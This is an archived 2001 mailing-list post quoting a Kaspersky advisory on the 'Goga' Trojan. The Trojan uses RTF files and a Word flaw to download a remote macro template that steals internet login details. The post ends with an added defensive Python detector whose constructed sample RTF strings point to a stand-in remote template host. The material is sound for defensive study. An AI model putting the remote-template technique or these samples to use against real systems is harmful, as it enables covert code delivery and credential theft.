Microsloth Rich Text Format security hole!

George at Orwellian.Org George at Orwellian.Org
Thu Jun 28 02:51:20 PDT 2001


http://www.kaspersky.com/news.asp?tnews=0&nview=1&id=199&page=0
#    
#    Thursday, June 14, 2001
#    
#    Malicious Code in RTF Files: Yet another Prediction Comes True
#    
#    A Trojan program penetrates computers when reading RTF files
#    
#    Kaspersky Lab, an international data-security software-development 
#    company, warns users about the discovery of the Trojan "Goga" 
#    that steals and sends out from infected computers user details 
#    for Internet access (i.e. login, password and other information). 
#    Kaspersky Lab has already received several reports of the Trojan 
#    being detected "in the wild."
#    
#    "Goga" has two distinguishing features: the first is that it 
#    utilizes files in RTF format as a means for spreading, confusing 
#    users in as much as they believe these files to be absolutely 
#    safe, often opening them without first administering an anti-virus 
#    check. The second is that the Trojan exploits a well-known breach 
#    in the Microsoft Word security system, allowing a malefactor 
#    to launch a malicious code, unbeknownst to a user, immediately 
#    following the opening of an infected document.
#    
#    Breach hyperlink:
#    
#    http://www.microsoft.com/technet/treeview/default.asp?url=/technet/security/bulletin/MS01-028.asp
#    
#    Should a computer not be installed with the proper patch thwarting 
#    this breach, then when the infected RTF file is read, MS Word 
#    automatically downloads a template containing the malicious 
#    macro-program from a remote Web site without any warning 
#    whatsoever. This macro-program extracts additional utility from 
#    the RTF file's binary section. This utility searches the infected 
#    computer and creates another TXT file containing user Internet 
#    access details. At this point, "Goga" starts up the script program 
#    that publishes the newly created TXT file in a Web-site guest 
#    book open to the general public. The virus writer is now able 
#    to periodically cull stolen information from this site.
#    
#    Kaspersky Lab warned users about falling prey to this RTF-file 
#    danger on May 29. We once again recommend that users install 
#    the MS Word patch defending against this Trojan and any other 
#    malicious programs exploiting this breach ASAP.
#
#    Detection and removal procedures have already been added
#    to the Kaspersky Anti-Virus database daily update.
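
A defensive check for the behaviour the advisory describes, an RTF file that makes Word fetch its template from a remote site. This is an added example, not part of the original post or of Kaspersky's detection. It assumes the link is carried in the RTF `\template` destination (the advisory does not name the control word), and the sample documents and host name are constructed.

```python
import re

# RTF template destination, e.g. {\*\template <target>}; \* marks it ignorable.
TEMPLATE_RE = re.compile(rb"\{\s*(?:\\\*\s*)?\\template\b\s*([^{}]*)\}", re.I)
# RTF escapes that can hide a target from a plain string search: \'hh, \\, \{, \}
ESCAPE_RE = re.compile(r"\\(?:'([0-9a-fA-F]{2})|([\\{}]))")
# Targets that make the reader leave the local machine: URLs and UNC paths.
REMOTE_RE = re.compile(r"^(?:(?:https?|ftp|file)://|\\\\)", re.I)


def decode_rtf_text(raw: bytes) -> str:
    """Undo RTF escaping in one left-to-right pass so nothing is decoded twice."""
    def repl(m):
        return chr(int(m.group(1), 16)) if m.group(1) else m.group(2)
    return ESCAPE_RE.sub(repl, raw.decode("latin-1")).strip()


def find_template_refs(data: bytes):
    """Return a list of (target, is_remote) for each template destination."""
    refs = []
    for m in TEMPLATE_RE.finditer(data):
        target = decode_rtf_text(m.group(1))
        refs.append((target, bool(REMOTE_RE.match(target))))
    return refs


def is_suspicious(data: bytes) -> bool:
    """True for an RTF file whose template would be loaded from a remote host."""
    if not data.lstrip().startswith(b"{\\rtf"):
        return False
    return any(remote for _, remote in find_template_refs(data))


# Constructed samples (not taken from any real malware).
SAMPLE_REMOTE = rb"{\rtf1\ansi{\*\template http://template-host.example/x.dot}\pard Hello\par}"
SAMPLE_ESCAPED = rb"{\rtf1\ansi{\*\template h\'74tp://template-host.example/x.dot}\pard Hi\par}"
SAMPLE_UNC = rb"{\rtf1\ansi{\*\template \\\\template-host\\share\\x.dot}\pard Hi\par}"
SAMPLE_LOCAL = rb"{\rtf1\ansi{\*\template C:\\Templates\\Normal.dot}\pard Hi\par}"

if __name__ == "__main__":
    for name in ("SAMPLE_REMOTE", "SAMPLE_ESCAPED", "SAMPLE_UNC", "SAMPLE_LOCAL"):
        data = globals()[name]
        print(name, is_suspicious(data), find_template_refs(data))
```

A hit only says the document points at a remote template; whether Word fetches it silently depends on the patch level the advisory refers to.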
